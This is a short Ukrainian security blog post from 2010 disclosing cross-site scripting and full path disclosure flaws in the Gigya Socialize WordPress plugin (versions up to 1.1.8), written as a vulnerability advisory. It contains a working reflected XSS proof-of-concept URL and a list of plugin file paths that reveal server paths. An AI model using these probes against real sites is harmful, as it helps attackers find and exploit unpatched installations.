Websecurity - Веб безпека

22.04.2010

У квітні, 17.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні Gigya Socialize для WordPress. Дані уразливості я виявив на сайті http://codecamp.org.ua. Про що найближчим часом сповіщу розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

04.06.2010

XSS:

http://site/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

XSS має місце в логін віджеті даного плагіна.

Full path disclosure:

http://site/wp-content/plugins/gigya-socialize-for-wordpress/gs-for-wordpress.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/login.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/help.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/invite-friends.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/settings.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-connected.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-control.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-connected.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-logged-in.php

Уразливі Gigya Socialize 1.1.8 та попередні версії.

Зазначу, що це популярний компонент, що використовується на багатьох сайтах. За статистикою wordpress.org, даний компонент був викачаний лише з їхнього сайта 19484 рази.

This entry was posted on 15:17 04.06.2010 and is filed under Новини сайту, Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.